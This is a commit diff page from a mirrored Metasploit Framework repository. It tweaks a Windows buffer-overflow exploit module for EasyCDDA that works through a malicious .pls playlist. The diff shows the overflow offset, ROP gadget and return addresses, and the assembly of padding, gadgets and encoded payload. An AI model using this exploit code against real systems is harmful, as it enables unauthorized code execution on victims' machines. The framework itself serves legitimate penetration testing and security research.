infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Replace unnecessary NOP sled with random text

bug/bundler_fix
sgabe 2014-02-11 23:48:04 +01:00
parent 184ccb9e1e
commit 12471660e9
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/windows/fileformat/easycdda_pls_bof.rb
View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
# easycdda.exe 3.0.114.0 # easycdda.exe 3.0.114.0
# audconv.dll 7.0.815.0 # audconv.dll 7.0.815.0
{ {
'Offset' => 1108, 'Offset' => 1112,
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll] 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
} }
] ]
@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe] 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
].flatten.pack('V*') ].flatten.pack('V*')
sploit = rop_nops(target['Offset'] / 4) sploit = rand_text_alpha_upper(target['Offset'])
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
sploit << [target.ret].pack("V") sploit << [target.ret].pack("V")
sploit << rop_nops(22) sploit << rand_text_alpha_upper(56)
sploit << rop_nops(8)
sploit << rop_gadgets sploit << rop_gadgets
sploit << make_nops(4) sploit << make_nops(4)
sploit << payload.encoded sploit << payload.encoded